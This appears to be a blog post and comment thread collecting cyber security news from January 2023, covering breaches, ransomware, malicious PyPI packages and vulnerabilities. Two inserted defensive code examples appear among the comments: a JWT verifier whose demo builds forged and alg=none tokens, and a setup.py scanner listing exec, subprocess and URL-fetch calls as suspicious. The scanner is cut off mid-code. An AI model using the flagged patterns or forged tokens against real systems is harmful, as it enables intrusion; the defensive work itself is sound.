Cyber security news January 2023

This posting is here to collect cyber security news in January 2023.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

446 Comments

  1. Tomi Engdahl says:

    CircleCI security alert: Rotate any secrets stored in CircleCI https://circleci.com/blog/january-4-2023-security-alert/
    We wanted to make you aware that we are currently investigating a security incident, and that our investigation is ongoing. We will provide you updates about this incident, and our response, as they become available. At this point, we are confident that there are no unauthorized actors active in our systems; however, out of an abundance of caution, we want to ensure that all customers take certain preventative measures to protect your data as well. [...] Immediately rotate any and all secrets stored in CircleCI. These may be stored in project environment variables or in contexts. We also recommend customers review internal logs for their systems for any unauthorized access starting from December 21, 2022 through today, January 4, 2023, or upon completion of your secrets rotation

    Reply
  2. Tomi Engdahl says:

    Slack’s private GitHub code repositories stolen over holidays https://www.bleepingcomputer.com/news/security/slacks-private-github-code-repositories-stolen-over-holidays/
    “On December 29, 2022, we were notified of suspicious activity on our GitHub account. Upon investigation, we discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository. Our investigation also revealed that the threat actor downloaded private code repositories on December 27. No downloaded repositories contained customer data, means to access customer data, or Slack's primary codebase.” Original at https://slack.com/intl/en-gb/blog/news/slack-security-update

    Reply
  3. Tomi Engdahl says:

    Employees' personal identity numbers spread throughout the Apotti information system due to a technical fault; the data was not visible to patients
    https://yle.fi/a/74-20011737
    The fault has now been fixed. It is not yet known how many employees' personal identity numbers were openly viewable within the system

    Reply
  4. Tomi Engdahl says:

    An exceptionally good reason to install a software update: a bug shuts down an aircraft's engines when the landing gear touches the ground
    https://www.tivi.fi/uutiset/tv/6b360baa-edc5-44ec-a432-209aff7687d1
    The Airworthiness Directive published by the FAA at the end of December concerns the aircraft type's Pratt & Whitney 1500G series turbofan engines, or rather the software that controls the engines' operation

    Reply
  5. Tomi Engdahl says:

    A 1987 hit movie's prediction came true: a shadowy company attacks surveillance cameras in an unprecedented way https://www.is.fi/digitoday/art-2000009307770.html
    According to [the Israeli newspaper Haaretz], a company called Toka sells and develops technology that can forge both live video feeds from security cameras and old recordings. In addition to security cameras, Toka's solutions can also break into more ordinary webcams within a certain radius and view their footage in addition to forging it. Original at
    https://www.haaretz.com/israel-news/security-aviation/2022-12-26/ty-article-magazine/.premium/this-dystopian-cyber-firm-could-have-saved-mossad-assassins-from-exposure/00000185-0bc6-d26d-a1b7-dbd739100000

    Reply
  6. Tomi Engdahl says:

    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More https://samcurry.net/web-hackers-vs-the-auto-industry/
    [W]e found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it.
    Also
    https://therecord.media/ferrari-bmw-rolls-royce-porsche-and-more-fix-vulnerabilities-giving-car-takeover-capabilities/

    Reply
  7. Tomi Engdahl says:

    Ongoing Flipper Zero phishing attacks target infosec community https://www.bleepingcomputer.com/news/security/ongoing-flipper-zero-phishing-attacks-target-infosec-community/
    A new phishing campaign is exploiting the increasing interest of security community members towards Flipper Zero to steal their personal information and cryptocurrency

    Reply
  8. Tomi Engdahl says:

    Software provider denied insurance payout after ransomware attack https://www.malwarebytes.com/blog/news/2023/01/software-provider-denied-insurance-payout-after-ransomware-attack
    The Supreme Court of Ohio issued a ruling days before the New Year that a software and service provider shouldn’t be covered by insurance against a ransomware attack as it didn’t cause direct or physical harm to tangible components of software, as it doesn't have any. “When insurance policy covers ‘physical damage’, there must be direct physical loss or physical damage of the covered media containing the computer software in order for the software to be covered under the policy,” the opinion document noted

    Reply
  9. Tomi Engdahl says:

    Can You Trust Your VSCode Extensions?
    https://blog.aquasec.com/can-you-trust-your-vscode-extensions
    Aqua Nautilus researchers have recently discovered that attackers can easily impersonate popular Visual Studio Code extensions and trick unknowing developers into downloading them. In original vulnerability research, we've uncovered a new attack method which could act as an entry point for an attack on many organizations. We've also discovered that some extensions may have already been taking advantage to exploit this attack vector. In this blog, we will further explore our findings, including a POC we uploaded to the Marketplace, and break down how we conducted this research

    Reply
  10. Tomi Engdahl says:

    Rackspace: Customer email data accessed in ransomware attack https://www.bleepingcomputer.com/news/security/rackspace-customer-email-data-accessed-in-ransomware-attack/
    Rackspace revealed on Thursday that attackers behind last month’s incident accessed some of its customers’ Personal Storage Table (PST) files which can contain a wide range of information, including emails, calendar data, contacts, and tasks. As discovered during the now-finished investigation led by cybersecurity firm Crowdstrike, the attackers gained access to the personal storage folders of 27 Rackspace customers. Rackspace update at
    https://status.apps.rackspace.com/index/viewincidents?group=2

    Reply
  11. Tomi Engdahl says:

    Exploit drops for remote code execution bug in Control Web Panel https://portswigger.net/daily-swig/exploit-drops-for-remote-code-execution-bug-in-control-web-panel
    A pre-authentication remote code execution (RCE) exploit has landed for popular web hosting platform Control Web Panel (CWP). The corresponding vulnerability in CWP 7 was patched and then released in version 0.9.8.1147 on October 25. All previous versions are affected.
    CWP, formerly CentOS Web Panel, is a free-to-use, Linux control panel with roughly 200,000 servers in active use. The Proof of Concept (PoC) was posted to GitHub and YouTube yesterday (January 5) by Numan Türle, security engineer at Turkish infosec outfit Gais Security. Türle told The Daily Swig that he disclosed technical details and requested a CVE after receiving assurances that a sufficient number of servers had been updated to the patched version

    Reply
  12. Tomi Engdahl says:

    Freedom for MegaCortex ransomware victims – the fix is out https://www.theregister.com/2023/01/06/megacortex_ransomware_decryptor/
    An international law enforcement effort has released a decryptor for victims of MegaCortex ransomware, widely used by cybercriminals to infect large corporations across 71 countries to the tune of more than $100 million in damages

    Reply
  13. Tomi Engdahl says:

    Air France and KLM notify customers of account hacks https://www.bleepingcomputer.com/news/security/air-france-and-klm-notify-customers-of-account-hacks/
    Air France and KLM have informed Flying Blue customers that some of their personal information was exposed after their accounts were breached. Flying Blue is a loyalty program allowing clients of multiple airlines, including Air France, KLM, Transavia, Aircalin, Kenya Airways, and TAROM, to exchange loyalty points for various rewards

    Reply
  14. Tomi Engdahl says:

    Moldova's government hit by flood of phishing attacks https://therecord.media/moldova%ca%bcs-government-hit-by-flood-of-phishing-attacks/
    Moldova's cybersecurity regulator did not disclose whether the phishing campaigns were successful and how many state institutions were affected. It is also not clear who is behind these attacks and if the perpetrators were nation-state hackers or unaffiliated ransomware gangs. The regulator did not respond to The Record's request for comment

    Reply
  15. Tomi Engdahl says:

    Malicious PyPi packages create CloudFlare Tunnels to bypass firewalls https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-create-cloudflare-tunnels-to-bypass-firewalls/
    Six malicious packages on PyPI, the Python Package Index, were found installing information-stealing and RAT (remote access trojan) malware while using Cloudflare Tunnel to bypass firewall restrictions for remote access. The malicious packages attempt to steal sensitive user information stored in browsers, run shell commands, and use keyloggers to steal typed secrets

    Reply
  16. Tomi Engdahl says:

    SpyNote Android malware infections surge after source code leak https://www.bleepingcomputer.com/news/security/spynote-android-malware-infections-surge-after-source-code-leak/
    The Android malware family tracked as SpyNote (or SpyMax) has had a sudden increase in detections in the final quarter of 2022, which is attributed to a source code leak of one of its latest, known as ‘CypherRat.’ Threat actors quickly snatched the malware’s source code and launched their own campaigns. Almost immediately, custom variants appeared that targeted reputable banks like HSBC and Deutsche Bank

    Reply
  17. Tomi Engdahl says:

    The Cybercriminal Who Rose from the Dead https://blogs.blackberry.com/en/2023/01/cybercriminal-faked-death-found
    When the U.S. government revealed charges against 26-year-old Mark Sokolovsky, it stunned more than a few cybersecurity researchers.
    After all, they thought he was dead. Sokolovsky is now in a European jail, awaiting extradition to the United States, accused of being a key player in a massive international cybercrime operation that spawned a notorious Malware-as-a-Service (MaaS) known as Raccoon InfoStealer. The information-stealer targeted Windows® users, seeking out and swiping their stored credentials, which could then be sold on the dark web

    Reply
  18. Tomi Engdahl says:

    Hackers Exploit Fortinet Devices to Spread Ransomware within Corporate Environments, Warns eSentire https://www.esentire.com/blog/hackers-exploit-fortinet-devices-to-spread-ransomware-within-corporate-environments-warns-esentire
    In November 2022, TRU intercepted and shut down two separate cyber intrusions stemming from vulnerable Fortinet devices managed by third-party providers. It's not clear whether the ransomware actors bought access through an Initial Access Broker or conducted the attacks themselves. The two targets included a college in Canada and a global investment firm. [...] A flood of initial access offerings for a particular hardware or software product on Dark Web marketplaces is indicative of a high value target. In the case of Fortinet, many of the sales were labeled New Forti. As mentioned previously, brokers offered buyers access to individual companies, which appeared to sell relatively quickly, as well as bulk sales that took longer for the brokers to move

    Reply
  19. Tomi Engdahl says:

    User Documents Overwritten With Malicious Code in Recent Dridex Attacks on macOS
    https://www.securityweek.com/user-documents-overwritten-malicious-code-recent-dridex-attacks-macos

    The cybercriminals behind the Dridex banking trojan have adopted a new tactic in recent attacks targeting macOS devices, overwriting the victim’s document files to deliver their malicious code, Trend Micro reports.

    Active since at least 2012 and considered one of the most prevalent financial threats, Dridex survived a takedown attempt in 2015 and remained operational after receiving various updates. In 2019, the DHS warned of continuous Dridex attacks targeting financial institutions.

    Reply
  20. Tomi Engdahl says:

    Qualcomm UEFI Flaws Expose Microsoft, Lenovo, Samsung Devices to Attacks
    https://www.securityweek.com/qualcomm-uefi-flaws-expose-microsoft-lenovo-samsung-devices-attacks

    Many devices made by Microsoft, Lenovo, Samsung and likely others are affected by potentially serious UEFI firmware vulnerabilities in Qualcomm Snapdragon chips.

    Qualcomm announced this week the availability of patches for a dozen vulnerabilities, including five connectivity- and boot-related issues discovered by researchers at firmware security company Binarly.

    Alex Matrosov, founder and CEO of Binarly, told SecurityWeek that they discovered a total of nine vulnerabilities while analyzing the firmware for Lenovo Thinkpad X13s laptops powered by the Qualcomm Snapdragon system-on-a-chip (SoC).

    Further analysis revealed that while some of the nine flaws are specific to Lenovo devices, five of them impact Qualcomm reference code, which means the vulnerabilities are also present in laptops and other devices using Snapdragon chips.

    The Snapdragon CPU uses the Arm architecture and Matrosov said this is the first such disclosure of UEFI firmware vulnerabilities related to the Arm device ecosystem.

    “Based on Qualcomm’s advisory, the number of affected chipsets is massive,” Matrosov said via email.

    Two types of vulnerabilities were discovered — stack-based buffer overflows and out-of-bounds read issues — both related to the DXE driver. They can be exploited by local attackers with elevated privileges, according to Lenovo’s advisory.

    Qualcomm said patches for the vulnerabilities found by Binarly were made available to customers in November 2022, and the company has encouraged affected end users to apply security updates when they become available from device makers.

    Binarly plans on disclosing technical details in a blog post scheduled for January 9.

    Reply
  21. Tomi Engdahl says:

    Rackspace Completes Investigation Into Ransomware Attack
    https://www.securityweek.com/rackspace-completes-investigation-ransomware-attack

    Cloud company Rackspace has completed its investigation into the recent ransomware attack and found that the hackers did access some customer resources.

    The ransomware attack only hit Rackspace’s Hosted Exchange environment, which the company was forced to shut down as a result of the incident. In its last update, Rackspace said the cybercriminals accessed the Personal Storage Table (PST) of 27 customers out of a total of nearly 30,000 customers.

    https://www.securityweek.com/rackspace-confirms-ransomware-attack-it-tries-determine-if-data-was-stolen

    Reply
  22. Tomi Engdahl says:

    More Political Storms for TikTok After US Government Ban
    https://www.securityweek.com/more-political-storms-tiktok-after-us-government-ban

    TikTok faces an uncertain year ahead in the United States as anti-China Republicans take greater control in Congress demanding tighter scrutiny for the highly popular video sharing app. Owned by Chinese tech giant ByteDance, TikTok has become a political punching bag for US conservatives who allege that the app downloaded by millions of US young people can be circumvented for spying or propaganda by the Chinese Communist Party (CCP).

    Reply
  23. Tomi Engdahl says:

    16 Car Makers and Their Vehicles Hacked via Telematics, APIs, Infrastructure
    https://www.securityweek.com/16-car-makers-and-their-vehicles-hacked-telematics-apis-infrastructure

    A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car functions and start or stop the engine.

    Multiple other security defects, the researchers say, allowed them to access a car maker’s internal applications and systems, leading to the exposure of personally identifiable information (PII) belonging to customers and employees, and account takeover, among others. The hacks targeted telematic systems, automotive APIs, and infrastructure.

    Impacted car models include Acura, BMW, Ferrari, Ford, Genesis, Honda, Hyundai, Infiniti, Jaguar, Kia, Land Rover, Mercedes-Benz, Nissan, Porsche, Rolls Royce, and Toyota. The vulnerabilities were identified over the course of 2022. Car manufacturers were informed about the security holes and they released patches.

    Vehicle impact

    According to the researchers, they were able to send commands to Acura, Genesis, Honda, Hyundai, Kia, Infiniti, Nissan, and Porsche vehicles.

    Using only the VIN (vehicle identification number), which is typically visible on the windshield, the researchers were able to start/stop the engine, remotely lock/unlock the vehicle, flash headlights, honk vehicles, and retrieve the precise location of Acura, Honda, Kia, Infiniti, and Nissan cars.

    They could also lock users out of remote vehicle management and could change car ownership.

    Reply
  24. Tomi Engdahl says:

    Burger Chain Five Guys Discloses Data Breach Impacting Job Applicants
    https://www.securityweek.com/burger-chain-five-guys-discloses-data-breach-impacting-job-applicants

    US burger chain Five Guys has disclosed a data breach impacting job applicants, and the company may be facing a lawsuit over the cybersecurity incident.

    Five Guys appears to have started informing customers on December 29, when it also notified state authorities about the incident.

    It’s not uncommon for companies to disclose cybersecurity incidents just before or during major holidays in an effort to avoid too much media coverage. However, Five Guys’ data breach notification was noticed by Turke & Strauss, a law firm specializing in data breaches.

    The law firm, which is urging impacted individuals to get in touch to discuss potential legal action against the fast food chain, revealed that exposed information includes names, Social Security numbers, and driver’s license numbers.

    Reply
  25. Tomi Engdahl says:

    https://hackaday.com/2023/01/06/this-week-in-security-lastpass-takeaway-bitcoin-loss-and-pytorch/

    Bitcoin Hacker Hacked

    Luke Dashjr is a Bitcoin Core developer, the primary signer of the Bitcoin Knots software, and has suffered a major security breach. This may be a follow-on incident from a November physical attack, where someone managed to reboot his co-located server from a flash drive, and install a backdoor. That one was caught, and the malware was seemingly removed. Luke lost a total of about 200 bitcoin, out of both his active (hot) and offline (cold) wallets. He’s treating this as a total compromise, and has warned that his PGP key should be suspect as well. That means recent releases of Bitcoin Knots should be suspect, too.

    https://twitter.com/LukeDashjr/status/1609613748364509184

    Reply
  26. Tomi Engdahl says:

    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
    https://samcurry.net/web-hackers-vs-the-auto-industry/

    Reply
  27. Tomi Engdahl says:

    Elizabeth Dwoskin / Washington Post:
    How Telegram, TikTok, Instagram, Facebook, and Twitter were used to boost election fraud claims in Brazil before riots hit congress and supreme court buildings

    https://www.washingtonpost.com/technology/2023/01/08/brazil-bolsanaro-twitter-facebook/

    Reply
  28. Tomi Engdahl says:

    Hundreds of euros are paid for a 20-year-old Nokia phone – the reason is grim https://www.is.fi/digitoday/tietoturva/art-2000009314642.html

    Large sums are still being paid today for a Nokia phone model that belongs mostly in a museum, security expert Mikko Hyppönen said on Twitter. The phone in question is the Nokia 1100, specifically the RH-18 version manufactured at the Bochum factory in Germany in 2003–2004.

    The reason is a firmware vulnerability in the phones. According to Hyppönen, it presumably makes it possible to program the phone to receive text messages sent to another phone number. This would make it possible to hijack, for example, online banking data.

    The phones' weakness has been known for a long time. In 2009, security company Ultrascan was able to modify a Bochum-made 1100 so that it could capture a one-time password sent by a bank as a text message. Digitoday wrote about it at the time.

    At the time, Nokia denied there was a flaw in the phone software and pointed out that the scam also requires a clone of the victim's SIM card.

    Reply
  29. Tomi Engdahl says:

    Exclusive: Russian hackers targeted U.S. nuclear scientists https://www.reuters.com/world/europe/russian-hackers-targeted-us-nuclear-scientists-2023-01-06/
    A Russian hacking team known as Cold River targeted three nuclear research laboratories in the United States this past summer, according to internet records reviewed by Reuters and five cyber security experts. [..] Cold River targeted the Brookhaven (BNL), Argonne (ANL) and Lawrence Livermore National Laboratories (LLNL), according to internet records that showed the hackers creating fake login pages for each institution and emailing nuclear scientists in a bid to make them reveal their passwords

    Reply
  30. Tomi Engdahl says:

    This is the end, Windows 7 and 8 friends. Microsoft support ends this week https://www.theregister.com/2023/01/09/microsoft_windows_7_8_support_ends/
    As Microsoft has been warning, the company is yanking support for Windows 7 Extended Security Update (ESU) and Windows 8 and 8.1 on Tuesday, January 10, which means users of those OSes will need to shift to Windows 10 or 11 to continue getting technical assistance and software updates

    Reply
  31. Tomi Engdahl says:

    Identity Thieves Bypassed Experian Security to View Credit Reports https://krebsonsecurity.com/2023/01/identity-thieves-bypassed-experian-security-to-view-credit-reports/
    Identity thieves have been exploiting a glaring security weakness in the website of Experian, one of the big three consumer credit reporting bureaus. Normally, Experian requires that those seeking a copy of their credit report successfully answer several multiple choice questions about their financial history. But until the end of 2022, Experian's website allowed anyone to bypass these questions and go straight to the consumer's report. All that was needed was the person's name, address, birthday and Social Security number

    Reply
  32. Tomi Engdahl says:

    Initial access techniques in Kubernetes environments used by Kinsing malware
    https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/initial-access-techniques-in-kubernetes-environments-used-by/ba-p/3697975
    In this blog post, we will focus on a specific angle of Kinsing: the initial access techniques in Kubernetes environments. While Kinsing uses multiple initial access vector techniques, in Microsoft Defender for Cloud, we recently observed two methods that are especially common: Exploitation of weakly configured PostgreSQL containers and exploiting vulnerable images. We will discuss these methods and explain how organizations can detect and mitigate those threats

    Reply
  33. Tomi Engdahl says:

    Serbian government reports massive DDoS attack amid heightened tensions in Balkans https://therecord.media/serbian-government-reports-massive-ddos-attack-amid-heightened-tensions-in-balkans/
    So far five large attacks aimed at disabling the IT infrastructure of the Ministry of Interior have been repelled, said Belgrade, adding that government employees and staff from state-owned Telekom Srbija (Telecom Serbia) were able to counter the attacks

    Reply
  34. Tomi Engdahl says:

    New Study Uncovers Text-to-SQL Model Vulnerabilities Allowing Data Theft and DoS Attacks https://thehackernews.com/2023/01/new-study-uncovers-text-to-sql-model.html
    “To better interact with users, a wide range of database applications employ AI techniques that can translate human questions into SQL queries (namely Text-to-SQL),” Xutan Peng, a researcher at the University of Sheffield, told The Hacker News. The findings, which were validated against two commercial solutions BAIDU-UNIT and AI2sql, mark the first empirical instance where natural language processing (NLP) models have been exploited as an attack vector in the wild.
    Paper at https://arxiv.org/abs/2211.15363

    Reply
  35. Tomi Engdahl says:

    Unwrapping Ursnif's Gifts
    https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
    In late August 2022, we investigated an incident involving Ursnif malware, which resulted in Cobalt Strike being deployed. This was followed by the threat actors moving laterally throughout the environment using an admin account

    Reply
  36. Tomi Engdahl says:

    Three Lessons from Threema: Analysis of a Secure Messenger
    https://breakingthe3ma.app/
    In our work, we present seven attacks against the cryptographic protocols used by Threema, in three distinct threat models. All the attacks are accompanied by proof-of-concept implementations that demonstrate their feasibility in practice. Rebuttal at https://threema.ch/en/blog/posts/news-alleged-weaknesses-statement
    “[T]he paper is based on an old protocol that is no longer in use. The presented findings do not apply to Threema's current communication protocol Ibex or have already been addressed.”

    Reply
  37. Tomi Engdahl says:

    I scanned every package on PyPi and found 57 live AWS keys https://tomforb.es/i-scanned-every-package-on-pypi-and-found-57-live-aws-keys/
    After inadvertently finding that InfoSys leaked an AWS key on PyPi I wanted to know how many other live AWS keys may be present on Python package index. After scanning every release published to PyPi I found 57 valid access keys

    Reply
  38. Tomi Engdahl says:

    Vice Society Releases Info Stolen From 14 UK Schools, Including Passport Scans https://www.darkreading.com/attacks-breaches/vice-society-releases-info-stolen-uk-schools-passport-scans
    Another month, another release of personal information stolen from a school system. This time, it’s a group of 14 schools in the United Kingdom. In what’s become a pattern, the cybercriminal ring stole data, demanded payment, and posted personal information when ransom was denied

    Reply
  39. Tomi Engdahl says:

    CISA Notifies Hitachi Energy Customers of High-Severity Vulnerabilities
    https://www.securityweek.com/cisa-notifies-hitachi-energy-customers-high-severity-vulnerabilities

    The US Cybersecurity and Infrastructure Security Agency (CISA) published advisories last week to inform organizations using Hitachi Energy products about several recently addressed critical and high-severity vulnerabilities.

    CISA has published three advisories describing security flaws in three products made by energy solutions provider Hitachi Energy. The vendor published its own advisories for the vulnerabilities in December. The advisories, hosted on ABB’s website, were released just weeks before ABB announced that it had completed the sale of its remaining stake in Hitachi Energy to Hitachi.

    One CISA advisory describes five high-severity vulnerabilities in UNEM, a component of Hitachi Energy’s network management system (NMS). The issues are related to encryption and user credentials, and they can be exploited to obtain sensitive information and make malicious modifications to the system. Network access to the targeted system is required for exploitation.

    Reply
  40. Tomi Engdahl says:

    Air France, KLM Customers Warned of Loyalty Program Account Hacking
    https://www.securityweek.com/air-france-klm-customers-warned-loyalty-program-account-hacking

    Franco-Dutch airline company Air France-KLM has started informing Flying Blue customers of a data breach involving their user accounts.

    Air France-KLM was formed in 2004, following the merger between Air France and KLM. Flying Blue is their loyalty program, also used by Aircalin, Kenya Airways, TAROM, and Transavia.

    Last week, the airline group started notifying Flying Blue customers of suspicious activity on their accounts, saying that some of their personal information might have been compromised during the incident.

    “Our security operations teams have detected suspicious behavior by an unauthorized entity in relation to your account. We have immediately implemented corrective action to prevent further exposure of your data,” the notification reads.

    Potentially compromised data includes names, phone numbers, email addresses, Flying Blue numbers and level, miles balance, and last transaction.

    According to Air France-KLM, no credit card data or payment information was exposed during the incident.

    https://twitter.com/BurgerhoutJ/status/1611427713629175808

    Reply
  41. Tomi Engdahl says:

    Justices Turn Away Israeli Spyware Maker in WhatsApp Suit
    https://www.securityweek.com/justices-turn-away-israeli-spyware-maker-whatsapp-suit

    The Supreme Court on Monday rejected an Israeli spyware maker’s bid to derail a high-profile lawsuit filed by the WhatsApp messaging service.

    The justices left in place lower court rulings against the Israeli firm, NSO Group. WhatsApp claims that NSO targeted some 1,400 users of the encrypted messaging service with highly sophisticated spyware.

    Reply
  42. Tomi Engdahl says:

    Microsoft Flags Ransomware Problems on Apple’s macOS Platform
    https://www.securityweek.com/microsoft-flags-ransomware-problems-apples-macos-platform

    Security researchers at Microsoft are flagging ransomware attacks on Apple’s flagship macOS operating system, warning that financially motivated cybercriminals are abusing legitimate macOS functionalities to exploit vulnerabilities, evade defenses, or coerce users to infect their devices.

    In a blog post documenting its research into four known macOS ransomware families, Microsoft’s Security Threat Intelligence team published IOCs and technical details to show how ransomware actors target users on macOS-powered devices.

    Reply
  43. Tomi Engdahl says:

    Your online bank may be skilfully faked – one mistake starts the criminals' nasty process
    Contacts related to scams have nearly doubled, the Finnish Financial Ombudsman Bureau (Vakuutus- ja rahoitusneuvonta) reports.
    https://www.iltalehti.fi/digiuutiset/a/5f976126-b112-48e1-acd8-5cb5f74a1495

    Customers are being scammed with fake websites that look like online banks, the Finnish Financial Ombudsman Bureau Fine says in a press release.

    Contacts related to scam cases have nearly doubled compared to the previous year. A total of 450 contacts about scams have been received, Fine says.

    Reply
  44. Tomi Engdahl says:

    Finland has become a more attractive target for cyberattacks
    https://etn.fi/index.php/13-news/14440-suomesta-tullut-houkuttelevampi-kohde-kyberhyoekkaeyksille

    The research arm of security company Check Point reports that the number of cyberattacks in Finland grew by 81 percent in 2022 compared to the previous year. On average, in 2022 there were 1,228 cyberattacks per organization per week in Finland.

    Reply
  45. Tomi Engdahl says:

    Vulnerability in Popular JsonWebToken Open Source Project Leads to Code Execution
    https://www.securityweek.com/vulnerability-popular-jsonwebtoken-open-source-project-leads-code-execution

    A vulnerability in the JsonWebToken open source JavaScript package could be exploited to achieve remote code execution (RCE), Palo Alto Networks’ Unit 42 warns.

    Maintained by the Auth0 team and designed to help with the verification and signing of web token (JWT) requests, JsonWebToken is used in many applications for authentication and authorization, and has more than 9 million weekly downloads.

    Tracked as CVE-2022-23529 (CVSS score of 7.6), the vulnerability was found in the package’s verify function and can be exploited using a maliciously crafted JSON JWT request.

    During the authentication process, the user-supplied credentials are sent to the authentication endpoint, which validates the information and issues a JWT signed with a secret key.

    Moving forth, when a user requests access to resources, the application sends a request containing a JWT in the authorization header, which is verified using the secret key.

    Reply
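The sign-with-a-secret / verify-with-the-same-secret flow summarised in the comment above, as an added example that is not code from the jsonwebtoken package, Auth0 or Unit 42. It is a stdlib-only HS256 issuer and verifier; the function names (issue_token, verify_token, rejection_reason, demo), the demo secret and the claims are constructed for this illustration. The point it shows beyond the prose is the order of checks a verify() routine has to make before it may read a single claim: structure, algorithm pinned by the server (never chosen by the token header), constant-time signature comparison, then expiry.

```python
# Added example, not code from the jsonwebtoken package, Auth0 or Unit 42: a
# stdlib-only HS256 issuer and verifier. Names (issue_token, verify_token,
# rejection_reason, demo) and the demo secret/claims are constructed for this
# illustration.
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


class InvalidToken(Exception):
    """Raised for any token the resource server must not act on."""


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(claims: dict, secret: bytes) -> str:
    """Authentication endpoint: after checking credentials, sign the claims with the secret."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_token(token: str, secret: bytes, now: Optional[float] = None) -> dict:
    """Resource server: validate structure, algorithm, signature and expiry, in that
    order, and only then return the claims. The header is never allowed to choose
    the algorithm; we accept HS256 with our own secret and nothing else."""
    if not isinstance(token, str) or token.count(".") != 2:
        raise InvalidToken("malformed token")
    h_b64, p_b64, s_b64 = token.split(".")
    try:
        header = json.loads(_b64url_decode(h_b64))
        claims = json.loads(_b64url_decode(p_b64))
        signature = _b64url_decode(s_b64)
    except ValueError as exc:  # bad base64, bad JSON or bad UTF-8
        raise InvalidToken("undecodable token") from exc
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise InvalidToken("unsupported alg")
    if not isinstance(claims, dict):
        raise InvalidToken("claims must be an object")
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):  # constant-time comparison
        raise InvalidToken("bad signature")
    exp = claims.get("exp")
    current = time.time() if now is None else now
    if isinstance(exp, (int, float)) and current >= exp:
        raise InvalidToken("expired")
    return claims


def rejection_reason(token: str, secret: bytes, now: Optional[float] = None) -> Optional[str]:
    """None if the token verifies, otherwise the reason it was rejected."""
    try:
        verify_token(token, secret, now)
    except InvalidToken as exc:
        return str(exc)
    return None


def demo() -> dict:
    """Constructed scenario: one valid token and four tokens a verifier must reject."""
    secret = b"constructed-demo-secret"
    good = issue_token({"sub": "alice", "exp": 2000}, secret)
    h, p, s = good.split(".")
    # same signature, edited claims: signature no longer covers the payload
    forged_claims = f"{h}.{_b64url_encode(json.dumps({'sub': 'admin', 'exp': 2000}).encode())}.{s}"
    # header says alg=none, empty signature: the token must not pick the algorithm
    alg_none = f"{_b64url_encode(json.dumps({'alg': 'none'}).encode())}.{p}."
    return {
        "valid": rejection_reason(good, secret, now=1000),
        "wrong_secret": rejection_reason(good, b"guess", now=1000),
        "forged_claims": rejection_reason(forged_claims, secret, now=1000),
        "alg_none": rejection_reason(alg_none, secret, now=1000),
        "expired": rejection_reason(good, secret, now=3000),
    }


if __name__ == "__main__":
    print(demo())
```

The verifier accepts one algorithm, fixed in code, so a token header of `none` or of a different family is refused before any key material is touched; the signature is compared with `hmac.compare_digest`; and `exp` is only read after the signature has been proven, since an unverified claim is just attacker-controlled JSON.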
  46. Tomi Engdahl says:

    GitHub Introduces Automatic Vulnerability Scanning Feature
    https://www.securityweek.com/github-introduces-automatic-vulnerability-scanning-feature

    Microsoft-owned code hosting platform GitHub is now providing developers with the option to have their code repositories automatically scanned for vulnerabilities.

    Available as a ‘default setup’ option, the new feature is meant to help code builders find and resolve vulnerabilities faster.

    Available for JavaScript, Python, and Ruby repositories, it allows open source developers and enterprises to enable code scanning without the use of a .yaml file and will immediately provide them with insights into their code’s issues.

    To enable the new option, GitHub users should head to the ‘Settings’ tab in their repositories and then navigate to ‘Code security and analysis’, under ‘Security’.

    Reply
  47. Tomi Engdahl says:

    PyPI Users Targeted With PoweRAT Malware
    https://www.securityweek.com/pypi-users-targeted-powerat-malware

    Software supply chain security firm Phylum has identified a malicious attack targeting Python Package Index (PyPI) users with the PoweRAT backdoor and information stealer.

    The campaign was first detected on December 22, 2022, when a malicious package named PyroLogin was identified as Python malware designed to fetch code from a remote server and execute it silently.

    Between December 28 and 31, Phylum’s security researchers observed five additional packages containing code similar to PyroLogin being published to PyPI: EasyTimeStamp, Discorder, Discord-dev, Style.py, and PythonStyles.

    The infection chain, which involves the execution of various scripts and the abuse of legitimate operating system functions, begins with a setup.py file, meaning that the malware is automatically deployed if the malicious packages are installed using Pip.

    Reply
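The install-time execution channel the comment above describes (a setup.py that runs as soon as pip builds the sdist) is something a practitioner can check for before installing. The following is an added example, not Phylum's tooling and not code from the page: a static audit of a setup.py using only the standard library's ast module. The two setup.py samples embedded in it are constructed for this illustration, and the URL inside the suspicious sample is a placeholder string that is never fetched.

```python
# Added example, not Phylum's scanner: a static check for install-time code
# execution in setup.py, using only the stdlib ast module. Both sample setup.py
# strings are constructed for this illustration; the URL in the suspicious one is
# a placeholder that is never fetched.
import ast
from typing import Dict, List

# Calls that have no business in a package description. At module level, or in an
# overridden install hook, they run the moment `pip install` touches the sdist.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile",
    "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get",
    "base64.b64decode",
}
# setuptools commands that a malicious cmdclass override hooks for code execution.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}


def _import_aliases(tree: ast.AST) -> Dict[str, str]:
    """Map local names to qualified ones, so `from subprocess import Popen as P`
    is still recognised as subprocess.Popen."""
    aliases: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                top = alias.name.split(".")[0]
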